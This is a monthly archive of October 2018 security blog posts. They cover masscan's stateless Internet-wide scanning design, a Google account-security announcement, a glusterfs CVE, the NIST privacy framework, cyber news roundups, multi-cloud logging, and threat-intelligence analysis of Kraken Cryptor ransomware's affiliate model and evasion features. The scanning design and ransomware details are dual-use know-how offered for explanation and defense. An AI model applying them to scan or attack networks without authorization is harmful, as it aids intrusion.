Monthly Archives: October 2018

Masscan and massive address lists

I saw this go by on my Twitter feed. I thought I'd blog on how masscan solves the same problem.

Both nmap and masscan are port scanners. The differences is that nmap does an intensive scan on a limited range of addresses, whereas masscan does a light scan on a massive range of addresses, including the range of - (all addresses). If you've got a 10-gbps link to the Internet, it can scan the entire thing in under 10 minutes, from a single desktop-class computer.

How massan deals with exclude ranges is probably its defining feature. That seems kinda strange, since it's a little used feature in nmap. But when you scan the entire list, people will complain, with nasty emails, so you are going to build up a list of hundreds, if not thousands, of addresses to exclude from your scans.

Therefore, the first design choice is to combine the two lists, the list of targets to include and the list of targets to exclude. Other port scanners don't do this because they typically work from a large include list and a short exclude list, so they optimize for the larger thing. In mass scanning the Internet, the exclude list is the largest thing, so that's what we optimize for. It makes sense to just combine the two lists.

So the performance now isn't how to lookup an address in an exclude list efficiently, it's how to quickly choose a random address from a large include target list.

Moreover, the decision is how to do it with as little state as possible. That's the trick for sending massive numbers of packets at rates of 10 million packets-per-second, it's not keeping any bookkeeping of what was scanned. I'm not sure exactly how nmap randomizes it's addresses, but the documentation implies that it does a block of a addresses at a time, and randomizes that block, keeping state on which addresses it's scanned and which ones it hasn't.

The way masscan is not to randomly pick an IP address so much as to randomize the index.

To start with, we created a sorted list of IP address ranges, the targets. The total number of IP addresses in all the ranges is target_count (not the number of ranges but the number of all IP addresses). We then define a function pick() that returns one of those IP addresses given the index:

    ip = pick(targets, index);

Where index is in the range [0..target_count].

This function is just a binary search. After the ranges have been sorted, a start_index value is added to each range, which is the total number of IP addresses up to that point. Thus, given a random index, we search the list of start_index values to find which range we've chosen, and then which IP address address within that range. The function is here, though reading it, I realize I need to refactor it to make it clearer. (I read the comments telling me to refactor it, and I realize I haven't gotten around to that yet :-).

Given this system, we can now do an in-order (not randomized) port scan by doing the following:

    for (index=0; index<target_count; index++) {
        ip = pick(targets, index);

Now, to scan in random order, we simply need to randomize the index variable.

    for (index=0; index<target_count; index++) {
        xXx = shuffle(index);
        ip = pick(targets, xXx);

The clever bit is in that shuffle function (here). It has to take an integer in that range [0..target_count] and return another pseudo-random integer in the same range. It has to be a function that does a one-to-one mapping. Again, we are stateless. We can't create a table of all addresses, then randomize the order of the table, and then enumerate that table. We instead have to do it with an algorithm.

The basis of that algorithm, by the way, is DES, the Data Encryption Standard. That's how a block cipher works. It takes 64-bit number (the blocksize for DES) and outputs another 64-bit block in a one-to-one mapping. In ECB mode, every block is encrypted to a unique other block. Two input blocks can't encrypt into the same output block, or you couldn't decrypt it.

The only problem is the range isn't neat 64-bit blocks, or any number of bits. It's an inconveniently sized number. A cryptographer Phillip Rogaway wrote a paper how to change DES to support integer ranges instead. The upshot is that it uses integer division instead of shifts, which makes it more expensive.

So how we randomize that input variable is that we encrypt it, where the encrypted number is still in the same range.

Thus, the source of masscan's speed is the way it randomizes the IP addresses in a wholly stateless manner. It:
  • doesn't use any state, just enumerates an index from [0..target_count]
  • has a fast function given an index, retrieve the indexed IP address from a large list of ranges
  • has a fast function to randomize that index using the Power of Crypto
Given this as the base, there's lots of additional features we can add. For one thing, we are randomizing not only IP addresses to scan, but also ports. I think nmap picks the IP address first, then runs through a list of ports on that address. Masscan combines them altogether, so when scanning many ports on an address, they won't come as a burst in the middle of the scan, but be spread evenly throughout the scan. It allows you to do things like:

    masscan -p0-65535

For this to work, we make the following change to the inner loop:

    range = port_count * target_count;
    for (index=0; index<range; index++) {
        xXx = shuffle(index);
        ip = pick(targets, xXx % target_count);
        port = pick(targets, xXx / target_count);
        scan(ip, port);

By the way, the compile optimizes both the modulus and division operations into a single IDIV opcode on Intel x86, since that's how that instruction works, returning both results at once. Which is cool.

Another change we can make is sharding, spreading the scan across several CPUs or several servers. Let's say this is server #3 out of 7 servers sharing the load of the scan:

    for (index=shard; index<range; index += shard_count) {

Again, notice how we don't keep track of any state here, it's just a minor tweak to the loop, and now *poof* the sharding feature appears out of nowhere. It takes vastly more instructions to parse the configuration parameter (masscan --shard 3/7 ...) than it takes to actually do it.

Let's say that we want to pause and resume the scan. What state information do we need to save? The answer is just the index variable. Well, we also need the list of IP addresses that we are scanning. A limitation of this approach is that we cannot easily pause a scan and change the list of IP addresses.


The upshot here is that we've twisted the nature of the problem. By using a crypto function to algorithmically create a one-to-one mapping for the index variable, we can just linearly enumerate a scan -- but magically in random order. This avoids keeping state. It avoids having to lookup addresses in an exclude list. And we get other features that naturally fall out of the process.

What about IPv6?

You'll notice I talking only about IPv4, and masscan supports only IPv4. The maximum sized scan right now is 48 bits (16-bit port number plus 32-bit IPv4 address). Won't larger scans mean using 256 bit integers?

When I get around to adding IPv6, I'll still keep a 64-bit index. The index variable is the number of things you are going to probe, and you can't scan 64-bit space right now. You won't scan the entire IPv6 128-bit address space, but a lot of smaller address spaces that add up to less than 64-bits. So when I get around to adding IPv6, the concept will still work.

Announcing some security treats to protect you from attackers’ tricks

It’s Halloween 🎃 and the last day of Cybersecurity Awareness Month 🔐, so we’re celebrating these occasions with security improvements across your account journey: before you sign in, as soon as you’ve entered your account, when you share information with other apps and sites, and the rare event in which your account is compromised.

We’re constantly protecting your information from attackers’ tricks, and with these new protections and tools, we hope you can spend your Halloween worrying about zombies, witches, and your candy loot—not the security of your account.

Protecting you before you even sign in
Everyone does their best to keep their username and password safe, but sometimes bad actors may still get them through phishing or other tricks. Even when this happens, we will still protect you with safeguards that kick-in before you are signed into your account.

When your username and password are entered on Google’s sign-in page, we’ll run a risk assessment and only allow the sign-in if nothing looks suspicious. We’re always working to improve this analysis, and we’ll now require that JavaScript is enabled on the Google sign-in page, without which we can’t run this assessment.

Chances are, JavaScript is already enabled in your browser; it helps power lots of the websites people use everyday. But, because it may save bandwidth or help pages load more quickly, a tiny minority of our users (0.1%) choose to keep it off. This might make sense if you are reading static content, but we recommend that you keep Javascript on while signing into your Google Account so we can better protect you. You can read more about how to enable JavaScript here.

Keeping your Google Account secure while you’re signed in

Last year, we launched a major update to the Security Checkup that upgraded it from the same checklist for everyone, to a smarter tool that automatically provides personalized guidance for improving the security of your Google Account.

We’re adding to this advice all the time. Most recently, we introduced better protection against harmful apps based on recommendations from Google Play Protect, as well as the ability to remove your account from any devices you no longer use.
More notifications when you share your account data with apps and sites

It’s really important that you understand the information that has been shared with apps or sites so that we can keep you safe. We already notify you when you’ve granted access to sensitive information — like Gmail data or your Google Contacts — to third-party sites or apps, and in the next few weeks, we’ll expand this to notify you whenever you share any data from your Google Account. You can always see which apps have access to your data in the Security Checkup.

Helping you get back to the beginning if you run into trouble

In the rare event that your account is compromised, our priority is to help get you back to safety as quickly as possible. We’ve introduced a new, step-by-step process within your Google Account that we will automatically trigger if we detect potential unauthorized activity.

We'll help you:
  • Verify critical security settings to help ensure your account isn’t vulnerable to additional attacks and that someone can’t access it via other means, like a recovery phone number or email address.
  • Secure your other accounts because your Google Account might be a gateway to accounts on other services and a hijacking can leave those vulnerable as well.
  • Check financial activity to see if any payment methods connected to your account, like a credit card or Google Pay, were abused.
  • Review content and files to see if any of your Gmail or Drive data was accessed or mis-used.
Online security can sometimes feel like walking through a haunted house—scary, and you aren't quite sure what may pop up. We are constantly working to strengthen our automatic protections to stop attackers and keep you safe you from the many tricks you may encounter. During Cybersecurity Month, and beyond, we've got your back.

CVE-2018-14661 (glusterfs)

It was found that usage of snprintf function in feature/locks translator of glusterfs server 3.8.4, as shipped with Red Hat Gluster Storage, was vulnerable to a format string attack. A remote, authenticated attacker could use this flaw to cause remote denial of service.

NIST’s Creation of a Privacy Framework

On Tuesday, Oct. 16, the National Institute of Standards and Technology (NIST) held its “Kicking off the NIST Privacy Framework: Workshop #1” in Austin, Texas. I was honored to be asked to participate. This was the first in a series of public workshops focusing on the development of a useful and voluntary Privacy Framework, like the NIST Cybersecurity Framework (CSF).

Event participation was outstanding. NIST’s initial registration for the event was filled in less than 90 minutes. Realizing they needed a bigger room, NIST moved to a space that nearly doubled the potential attendance. When the reopening of the registration was announced, it was filled in less than an hour. Many well-known names in the privacy field attended, with the audience primarily consisting of privacy consultants, lawyers, and other professionals trying to figure out how the Privacy Framework fits into their future.

NIST previously brought together both public and private sector individuals interested in solving problems that face us all. The CSF was a highly successful effort to develop a lightweight, valuable, and adoptable framework focused on improving the “security programs” of organizations. While initially developed in response to presidential executive order 13636, the CSF was never meant to be a government document. Speaking to critical infrastructure and cybersecurity organization representatives at the first Cybersecurity Framework meeting, previous NIST director Dr. Pat Gallagher said, “This is not NIST’s framework, this is yours.” He was absolutely right.

Over the next year, more than 3,000 professionals participated in CSF workshops, responded to requests for information, and provided comments on work-in-progress drafts. The result was something that achieved the CSF’s initial goals: It’s beneficial to all sectors and is usable by a range of organizations from small businesses to some of the largest corporations on the planet. The CSF is having a positive global influence with its adoption by various countries. It’s also assisting in the global alignment of cybersecurity languages and practices.

NIST has established many of the same goals for the Privacy Framework. These goals include:

  1. Developing the Privacy Framework through a consensus-driven, open, and highly transparent process
  2. Establishing a common language, providing for a consistent means to facilitate communication across all aspects of an organization
  3. Ensuring it is adaptable and scalable to many differing types of organizations, technologies, lifecycle phases, sectors, and uses
  4. Developing a voluntary, risk-based, outcome-based, and non-prescriptive privacy framework
  5. Ensuring it is usable as part of any organization’s broader corporate risk management strategy and processes
  6. Taking advantage of and incorporating existing privacy standards, methodologies, and guidance
  7. Establishing it as a living document that is updated as technology and approaches to privacy change and as stakeholders learn from implementations

During the Privacy Framework Kickoff, I was pleased to hear questions that were similar to what I heard during the initial CSF Kickoff. There was real tension in the room during the CSF Kickoff—a sense of not knowing how it was going to impact organizations’ cybersecurity-related responsibilities. The same tension was present during the Privacy Framework Kickoff conversations. We are just beginning to try to understand a solution that doesn’t yet exist.

It’s hard to see the result of a Privacy Framework from where we sit today. How can we develop and position a framework like this to be valuable for both U.S. and global businesses? What is intended for this effort? What are potential definition needs? What is harm? What new technology could influence this? How do we position this for the next 25 years of privacy, not just the past five?

We have started down a path that will likely take more than a year to complete. I envision the emerging Privacy Framework as addressing best practices in privacy while being compatible with and supporting an organization’s ability to operate under the various domestic and international legal or regulatory regimes. The Privacy Framework should not be focused on the legal aspects of privacy, but rather on what organizations need to consider in their own privacy programs. This is a journey just begun. From my perspective, the workshop on Oct. 16 was an outstanding start to the development of a consensus-driven Privacy Framework. I look forward to the active discussions and work ahead.

The post NIST’s Creation of a Privacy Framework appeared first on McAfee Blogs.

Cyber Security Roundup for October 2018

Aside from Brexit, Cyber Threats and Cyber Attack accusations against Russia are very much on the centre stage of UK government's international political agenda at the moment. The government publically accused Russia's military 'GRU' intelligence service of being behind four high-profile cyber-attacks, and named 12 cyber groups it said were associated with the GRU. Foreign Secretary Jeremy Hunt said, "the GRU had waged a campaign of indiscriminate and reckless cyber strikes that served no legitimate national security interest".

UK Police firmly believe the two men who carried out the Salisbury poisoning in March 2018 worked for the GRU.

The UK National Cyber Security Centre said it had assessed "with high confidence" that the GRU was "almost certainly responsible" for the cyber-attacks, and also warned UK businesses to be on the alert for indicators of compromise by the Russian APT28 hacking group.  The NCSC said GRU hackers operated under a dozen different names, including Fancy Bear (APT28), had targetted:
  • The systems database of the Montreal-based World Anti-Doping Agency (Wada), using phishing to gain passwords. Athletes' data was later published 
  • The Democratic National Committee in 2016, when emails and chats were obtained and subsequently published online. The US authorities have already linked this to Russia.
  • Ukraine's Kyiv metro and Odessa airport, Russia's central bank, and two privately-owned Russian media outlets - and news agency Interfax - in October 2017. They used ransomware to encrypt the contents of a computer and demand payment 
  • An unnamed small UK-based TV station between July and August 2015, when multiple email accounts were accessed and content stolen

Facebook was fined the maximum amount of £500,000 under pre-GDPR data protection laws by the UK Information Commissioner's Office (ICO) over the Cambridge Analytica Scandal. Facebook could face a new ICO fine after revealing hackers had accessed the contact details of 30 Million users due to a flaw with Facebook profiles. The ICO also revealed a 400% increase in reported Cyber Security Incidents and another report by a legal firm RPC said the average ICO fines had doubled, and to expect higher fines in the future. Heathrow Airport was fined £120,000 by the ICO in October after a staff member lost a USB stick last October containing "sensitive personal data", which was later found by a member of the public.

Notable Significant ICO Security Related Fines

Last month's British Airways website hack was worse than originally reported, as they disclosed a second attack which occurred on 5th September 2018, when the payment page had 22 lines of malicious Javascript code injected in an attack widely attributed to Magecart.  Another airline Cathay Pacific also disclosed it had suffered a major data breach that impacted 9.4 million customer's personal data and some credit card data.

Morrisons has lost a challenge to a High Court ruling which made it liable for a data breach, after an employee, since jailed for 8 years, stole and posted thousands of its employees' details online in 2014.  Morrisons said it would now appeal to the Supreme Court., if that appeal fails, those affected will be able to claim compensation for "upset and distress". 

Interesting article on Bloomberg on "How China Used a Tiny Chip to Infiltrate U.S. Companies". However, there was a counter-narrative to the Bloomberg article on Sky News. But didn't stop Ex-Security Minister Admiral Lord West calling the Chinese when he said Chinese IT Kit 'is putting all of us at risk' if used in 5G.  He raises a valid point, given the US Commerce Department said it would restrict the export of software and technology goods from American firms to Chinese chipmaker Fujian Jinhua BT, which uses Huawei to supply parts for its network, told Sky News that it would "apply the same stringent security measures and controls to 5G when we start to roll it out, in line with continued guidance from government". Recently there have been warnings issued by the MoD and NCSC stating a Chinese espionage group known as APT10 are attacking IT suppliers to target military and intelligence information.

NCSC is seeking feedback on the latest drafts 'knowledge areas' on CyBOK, a Cyber Security body of knowledge which it is supporting along with academics and the general security industry.

Google are finally pulling the plug on Google+, after user personal data was left exposed. Google and the other three major web browser providers in the world said, in what seems like coordinated announcements, businesses must accept TLS Version 1.0 and 1.1 will no longer support after Q1 2018.

So its time to move over to the more secure TLS V1.2 or the more secure & efficient TLS V1.3.


10 Cyber Security Travel Tips to Protect Your Devices & Data

Cyber Security Travel Tips for Business & Leisure The holiday season is fast approaching, but hackers don’t take vacations. Whether you’re planning to go home for the holidays or travel for business on a regular basis, make sure to protect yourself from cyber crime with these cyber security travel tips. Cyber Security Travel Tip #1:… Read More

The post 10 Cyber Security Travel Tips to Protect Your Devices & Data appeared first on .

US government accuses Chinese hackers of stealing jet engine IP

The Justice Department has charged ten Chinese nationals -- two of which are intelligence officers -- of hacking into and stealing intellectual property from a pair of unnamed US and French companies between January 2015 to at least May of 2015. The hackers were after a type of turbofan (portmanteau of turbine and fan), a large commercial airline engine, to either circumvent its own development costs or avoid having to buy it. According to the complaint by the Department of Justice, a Chinese aerospace manufacturer was simultaneously working on making a comparable engine. The hack afflicted unnamed aerospace companies located in Arizona, Massachusetts and Oregon.

Via: ZD Net

Source: US Department of Justice

Building a Multi-cloud Logging Strategy: Issues and Pitfalls

Posted under: Heavy Research

As we begin our series on Multi-cloud logging, we start with reasons some traditional logging approaches don’t work. I don’t like to start with a negative tone, but we need to point out some challenges and pitfalls which often beset firms on first migration to cloud. That, and it helps frame our other recommendations later in this series. Let’s take a look at some common issues by category.


  • Scale & Performance: Most log management and SIEM platforms were designed and first sold before anyone had heard of clouds, Kafka, or containers. They were architected for ‘hub-and-spoke’ deployments on flat networks, when ‘Scalability’ meant running on a bigger server. This is important because the infrastructure we now monitor is agile – designed to auto-scale up when we need processing power, and back down to reduce costs. The ability to scale up, down, and out is essential to the cloud, but often missing from older logging products which require manual setup, lacking full API enablement and auto-scale capability.
  • Data Sources: We mentioned in our introduction that some common network log sources are unavailable in the cloud. Contrawise, as automation and orchestration of cloud resources are via API calls, API logs become an important source. Data formats for these new log sources may change, as do the indicators used to group events or users within logs. For example servers in auto-scale groups may share a common IP address. But functions and other ‘serverless’ infrastructure are ephemeral, making it impossible to differentiate one instance from the next this way. So your tools need to ingest new types of logs, faster, and change their threat detection methods by source.
  • Identity: Understanding who did what requires understandings identity. An identity may be a person, service, or device. Regardless, the need to map it, and perhaps correlate it across sources, becomes even more important in hybrid and multi-cloud environments
  • Volume: When SIEM first began making the rounds, there were only so many security tools and they were pumping out only so many logs. Between new security niches and new regulations, the array of log sources sending unprecedented amounts of logs to collect and analyze grows every year. Moving from traditional AV to EPP, for example, brings with it a huge log volume increase. Add in EDR logs and you’re really into some serious volumes. On the server side, moving from network and server logs to add application layer and container logs brings a non-trivial increase in volume. There are only so many tools designed to handle modern event rates (X billio events per day) and volumes (Y terabytes per day) without buckling under the load, and more importantly, there are only so many people who know how to deploy and operate them in production. While storage is plentiful and cheap in the cloud, you still need to get those logs to the desired storage from various on-premise and cloud sources – perhaps across IaaS, PaaS, and SaaS. If you think that’s easy call your SaaS vendor and ask how to export all your logs from their cloud into your preferred log store (S3/ADLS/GCS/etc.). That old saw from Silicon Valley, “But does it scale?” is funny but really applies in some cases.
  • Bandwidth: While we’re on the topic of ridiculous volumes, let’s discuss bandwidth. Network bandwidth and transport layer security between on-premise and cloud and inter-cloud is non-trivial. There are financial costs, as well as engineering and operational considerations. If you don’t believe me ask your AWS or Azure sales person how to move, say, 10 terabytes a day between those two. In some cases architecture only allows a certain amount of bandwidth for log movement and transport, so consider this when planning migrations and add-ons.


  • Multi-account Multi-cloud Architectures: Cloud security facilitates things like micro-segmentation, multi-account strategies, closing down all unnecessary network access, and even running different workloads in different cloud environments. This sort of segmentation makes it much more difficult for attackers to pivot if they gain a foothold. It also means you will need to consider which cloud native logs are available, what you need to supplement with other tooling, and how you will stitch all these sources together. Expecting to dump all your events into a syslog style service and let it percolate back on-premise is unrealistic. You need new architectures for log capture, filtering, and analysis. Storage is the easy part.
  • Monitoring “up the Stack”: As cloud providers manage infrastructure, and possibly applications as well, your threat detection focus must shift from networks to applications. This is both because you lack visibility into network operations, but also because cloud network deployments are generally more secure, prompting attackers to shift focus. Even if you’re used to monitoring the app layer from a security perspective, for example with a big WAF in front of your on-premise servers, do you know whether you vendor has a viable cloud offering? If you’re lucky enough to have one that works in both places, and you can deploy in cloud as well, answer this (before you initiate the project): Where will those logs go, and how will you get them there?
  • Storage vs. Ingestion: Data storage in cloud services, especially object storage, is so cheap it is practically free. And long-term data archival cloud services offer huge cost advantages over older on-premise solutions. In essence we are encouraged to store more. But while storage is cheap, it’s not always cheap to ingest more data into the cloud because some logging and analytics services charge based upon volume (gigabytes) and event rates (number of events) ingested into the tool/service/platform. Example are Splunk, Azure Eventhubs, AWS Kinesis, and Google Stackdriver. Many log sources for the cloud are verbose – both number of events and amount of data generated from each. So you will need to architect your solution to be economically efficient, as well as negotiate with your vendors over ingestion of noisy sources such as DNS and proxies, for example. A brief side note on ‘closed’ logging pipelines: Some vendors want to own your logging pipeline on top of your analytics toolset. This may sound convenient because it “just works” (mostly for their business model), but beware lock-in, both in terms of cost overruns from lack of ability to deduplicate or filter pre-ingestion (the meter catches every event), but also from the opportunity cost of lost analytical capabilities other tools could provide, but not if you can’t feed them a copy of your log stream. The fact that you can afford to move a bunch of logs from place to place doesn’t mean it’s easy. Some logging architectures are not conducive to sending logs to more than one place at a time, and once you are in their system, exporting all logs (not just alerts) to another analytical tool can be incredibly difficult and resource intensive, because events can be ‘cooked’ into their own proprietary format, which you then have to reverse during export to make sense for other analytical tools.


  • What to Filter and When: Compliance, regulatory, and contractual commitments prompt organizations to log everything and store it all forever (OK, not quite, but just about). And not just in production, but pre-production, development, and test systems. Combine that with overly chatty cloud logging systems (What do you plan to do with logs of every single API call into and inside your entire cloud?), and you are quickly overloaded. This results in both slower processing and higher costs. Dealing with this problem combines deciding what must be kept vs. filtered; what needs to be analyzed vs. captured for posterity; what is relevant today for security analysis and model building, vs. irrelevant tomorrow. One of the decision points you’ll want to address earlier is what you data consider perishable/real-time vs. historical/latency-tolerant.
  • Speed: For several years there has been a movement away from batch processing, and moving to real-time analysis (footnote: batch can be very slow [days] or very fast [micro-batching within 1-2 second windows], so we use ‘batch’ to mean anything not real-time, more like daily or less frequent). Batch mode, as well as normalization and storage prior to analysis, is becoming antiquated. The use of stream processing infrastructure, machine learning, and “stateless security” enable and even facilitate analysis of events as they are received. Changing the process to analyze in real time is needed to keep pace with attackers and fully automated attacks.
  • Automated Response: Many large corporations and government agencies suffered tremendously in 2017 from fast-spreading ‘ransomworms’ (also called ‘nukeware’) such as Wannacry/NotPetya in 2017. Response models tuned for stealthy low-and-slow IP and PII exfiltration attacks need revisiting. Once fast-movers execute you cannot detect your way past the grenades they leave in your datacenter. They are very obvious and very loud. The good news is that the cloud model inherently enables micro-segmentation and automated response. The cloud also doesn’t rely on ancient identity and network protocols which enable lateral movement, and continue to plague even the best on-premise security shops. Don’t forget that bad practices in the cloud won’t save you from even untargeted shenanigans. Remember the MongoDB massacre of January 2017? Fast response to things that look wrong is key to dropping the net on the bad guys as they try to pwn you. Knowing exactly what you have, its known-good state, and how to leverage new cloud capabilities, are all advantages the blue team needs to leverage.

Again, our point is not to bash older products, but to point out that cloud environments demand you re-think how you use tools and revisit your deployment models. Most can work with re-engineered deployment. We generally prefer to deploy known technologies when appropriate, which helps reduce the skills gap facing most security and IT teams. But in some cases you will find new and different ways to supplement existing logging infrastructure, and likely run multiple analysis capabilities in parallel.

Next up in our series: Multi-cloud logging architectures and design.

-Adrian & Gal

- Adrian Lane (0) Comments Subscribe to our daily email digest

Risky Business #520 — Tanya Janca talks security in the curriculum

We’ve got a great podcast for you this week. Tanya Janca will be talking about some volunteer work she’s been doing with a Canadian government panel on getting security content into children’s school curriculums.

In this week’s sponsor interview we’ll be talking with Ferruh Mavituna of Netsparker.

They launched Netsparker Cloud a while ago so now they have some decent telemetry I wanted to ask Ferruh what he’s found surprising now he’s sitting on a mountain of scan results. The types of bugs being turned up aren’t really a surprise, but the extent to which old software is a problem was actually pretty surprising to him. He knew it was bad, he says, but he didn’t know it’s this bad.

Adam Boileau, as usual, joins the show this week to talk about all the week’s security news:

  • More Chinese MSS officers indicted by the US DoJ
  • ASD chief speaks publicly on 5G Huawei ban
  • China playing funny buggers with BGP
  • Russia is still messing with the US during the midterms
  • Facebook boots more Iranian influence pages
  • New privacy features in Signal
  • Plus much, much more!

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes

Chinese Intelligence Officers and Their Recruited Hackers and Insiders Conspired to Steal Sensitive Commercial Aviation and Technological Data for Years | OPA | Department of Justice
U.S. charges Chinese intelligence officers for jet engine data hack
Huawei's ban to 5G network 'supported by technical advice', spy agency chief says - ABC News (Australian Broadcasting Corporation)
Canadian security boss ain't afraid of no Huawei, sees no reason for ban • The Register
US bans exports to Chinese DRAM maker citing national security risk | ZDNet
China has been 'hijacking the vital internet backbone of western countries' | ZDNet
Russia Is Meddling In The Midterms. The White House Just Isn't Talking About It.
The Crisis of Election Security - The New York Times
DHS: Election officials inundated, confused by free cyber-security offerings | ZDNet
Facebook removes more Iran-linked accounts, this time targeting the US & UK | ZDNet
We posed as 100 senators to run ads on Facebook. Facebook approved all of them. – VICE News
NYT: Chinese and Russian spies routinely eavesdrop on Trump’s iPhone calls | Ars Technica
North Korea blamed for two cryptocurrency scams, five trading platform hacks | ZDNet
New Signal privacy feature removes sender ID from metadata | Ars Technica
Windows Defender becomes first antivirus to run inside a sandbox | ZDNet
Pakistani bank denies losing $6 million in country's 'biggest cyber attack' | ZDNet
Many CMS plugins are disabling TLS certificate validation... and that's very bad | ZDNet
Twelve malicious Python libraries found and removed from PyPI | ZDNet
How ‘Mr. Hashtag’ Helped Saudi Arabia Spy on Dissidents - Motherboard
Government Spyware Vendor Left Customer, Victim Data Online for Everyone to See - Motherboard
Apple's T2 Security Chip Makes It Harder to Tap MacBook Mics | WIRED
Microsoft Windows zero-day disclosed on Twitter, again | ZDNet
Digital DASH – ICTC - Focus on Information Technology (FIT)

Kraken Ransomware Emerges from the Depths: How to Tame the Beast

Look out, someone has released the Kraken — or at least a ransomware strain named after it. Kraken Cryptor ransomware first made its appearance back in August, but in mid-September, the malicious beast emerged from the depths disguised as the legitimate spyware application SuperAntiSpyware. In fact, the attackers behind the ransomware were able to access the website and distribute the ransomware from there.

So how did this stealthy monster recently gain more traction? The McAfee Advanced Threat Research team, along with the Insikt group from Recorded Future, decided to uncover the mystery. They soon found that the Fallout Exploit kit, a type of toolkit cybercriminals use to take advantage of system vulnerabilities, started delivering Kraken ransomware at the end of September. In fact, this is the same exploit kit used to deliver GandCrab ransomware. With this new partnership between Kraken and Fallout, Kraken now has an extra vessel to employ its malicious tactics.

Now, let’s discuss how Kraken ransomware works to encrypt a victim’s computer. Kraken utilizes a business scheme called Ransomware-as-a-Service, or RaaS, which is a platform tool distributed by hackers to other hackers. This tool gives cybercriminals the ability to hold a victim’s computer files, information, and systems hostage. Once the victim pays the ransom, the hacker sends a percentage of the payment to the RaaS developers in exchange for a decryption code to be forwarded to the victim. However, Kraken wipes files from a computer using external tools, making data recovery nearly impossible for the victim. Essentially, it’s a wiper.

Kraken Cryptor ransomware employs a variety of tactics to keep it from being detected by many antimalware products. For example, hackers are given a new variant of Kraken every 15 days to help it slip under an antimalware solution’s radar. The ransomware also uses an exclusion list, a common method utilized by cybercriminals to avoid prosecution. The exclusion list archives all locations where Kraken cannot be used, suggesting that the cybercriminals behind the ransomware attacks reside in those countries. As you can see, Kraken goes to great lengths to cover its tracks, making it a difficult cyberthreat to fight.

Kraken’s goal is to encourage more wannabe cybercriminals to purchase this RaaS and conduct their own attacks, ultimately leading to more money in the developers’ pockets. Our research team observed that in Version 2 of Kraken, developers decreased their profit percentage by 5%, probably as a tactic to attract more affiliate hackers. The more criminal customers Kraken can onboard, the more attacks they can flesh out, and the more they can profit off of ransom collections.

So, what can users do to defend themselves from this stealthy monstrosity? Here are some proactive steps you can take:

  • Be wary of suspicious emails or pop-ups. Kraken was able to gain access to a legitimate website and other ransomware can too. If you receive a message or pop-up claiming to be from a company you trust but the content seems fishy, don’t click on it. Go directly to the source and contact the company from their customer support line.
  • Backup your files often. With cybercrime on the rise, it’s vital to consistently back up all of your important data. If your device becomes infected with ransomware, there’s no guarantee that you’ll get it back. Stay prepared and protected by backing up your files on an external hard drive or in the cloud.
  • Never pay the ransom. Although you may feel desperate to get your data back, paying does not guarantee that all of your information will be returned to you. Paying the ransom also contributes to the development of more ransomware families, so it’s best to just hold off on making any payments.
  • Use a decryption tool. No More Ransom provides tools to help users free their encrypted data. If your device gets held for ransom, check and see if a decryption tool is available for your specific strain of ransomware.
  • Use a comprehensive security solution. Add an extra layer of security on to all your devices by using a solution such as McAfee Total Protection, which now includes ransom guard and will help you better protect against these types of threats.

Want to learn more about Ransomware and how to defend against it? Visit our dedicated ransomware page.


The post Kraken Ransomware Emerges from the Depths: How to Tame the Beast appeared first on McAfee Blogs.

Fallout Exploit Kit Releases the Kraken Ransomware on Its Victims

Alexandr Solad and Daniel Hatheway of Recorded Future are coauthors of this post. Read Recorded Future’s version of this analysis. 

Rising from the deep, Kraken Cryptor ransomware has had a notable development path in recent months. The first signs of Kraken came in mid-August on a popular underground forum. In mid-September it was reported that the malware developer had placed the ransomware, masquerading as a security solution, on the website SuperAntiSpyware, infecting systems that tried to download a legitimate version of the antispyware software.

Kraken’s presence became more apparent at the end of September, when the security researcher nao_sec discovered that the Fallout Exploit Kit, known for delivering GandCrab ransomware, also started to deliver Kraken.

The McAfee Advanced Threat Research team, working with the Insikt group from Recorded Future, found evidence of the Kraken authors asking the Fallout team to be added to the Exploit Kit. With this partnership, Kraken now has an additional malware delivery method for its criminal customers.

We also found that the user associated with Kraken ransomware, ThisWasKraken, has a paid account. Paid accounts are not uncommon on underground forums, but usually malware developers who offer services such as ransomware are highly trusted members and are vetted by other high-level forum members. Members with paid accounts are generally distrusted by the community.


Kraken Cryptor’s developers asking to join the Fallout Exploit Kit.

Kraken Cryptor announcement.

The ransomware was announced, in Russian, with the following features:

  • Encoded in C# (.NET 3.5)
  • Small stub size ~85KB
  • Fully autonomous
  • Collects system information as an encrypted message for reference
  • File size limit for encryption
  • Encryption speed faster than ever
  • Uses a hybrid combination of encryption algorithms (AES, RC4, Salsa20) for secure and fast encryption with a unique key for each file
  • Enables the use of a network resource and adds an expansion bypass mode for encrypting all files on non-OS disks
  • Is impossible to recover data using a recovery center or tools without payment
  • Added antidebug, antiforensic methods

Kraken works with an affiliate program, as do ransomware families such as GandCrab. This business scheme is often referred to a Ransomware-as-a-Service (RaaS).

Affiliates are given a new build of Kraken every 15 days to keep the payload fully undetectable from antimalware products. According to ThisWasKraken, when a victim asks for a free decryption test, the affiliate member should send one of the victim’s files with its associated unique key to the Kraken Cryptor ransomware support service. The service will decrypt the file and resend it to the affiliate member to forward the victim. After the victim pays the full ransom, the affiliate member sends a percentage of the received payment to the RaaS developers to get a decryptor key, which is forwarded to the victim. This system ensures the affiliate pays a percentage to the affiliate program and does not simply pocket the full amount. The cut for the developers offers them a relatively safe way of making a profit without exposing themselves to the risk of spreading ransomware.

We have observed that the profit percentage for the developers has decreased from 25% in Version 1 to 20% in Version 2. The developers might have done this to attract more affiliates. To enter the program, potential affiliates must complete a form and pay $50 to be accepted.

In the Kraken forum post it states that the ransomware cannot be used in the following countries:

  • Armenia
  • Azerbaijan
  • Belarus
  • Estonia
  • Georgia
  • Iran
  • Kazakhstan
  • Kyrgyzstan
  • Latvia
  • Lithuania
  • Moldova
  • Russia
  • Tajikistan
  • Turkmenistan
  • Ukraine
  • Uzbekistan

On October 21, Kraken’s authors released Version 2 of the affiliate program, reflecting the ransomware’s popularity and a fresh release. At the same time, the authors published a map showing the distribution of their victims:

Note that some of the countries on the developers’ exclusion list have infections.

Video promotions

The first public release of Kraken Cryptor was Version 1.2; the latest is Version 2.07. To promote the ransomware, the authors created a video showing its capabilities to potential customers. We analyzed the metadata of the video and believe the authors created it along with the first version, released in August.

In the video, the authors show how fast Kraken can encrypt data on the system:

Kraken ransomware in action.

Actor indications

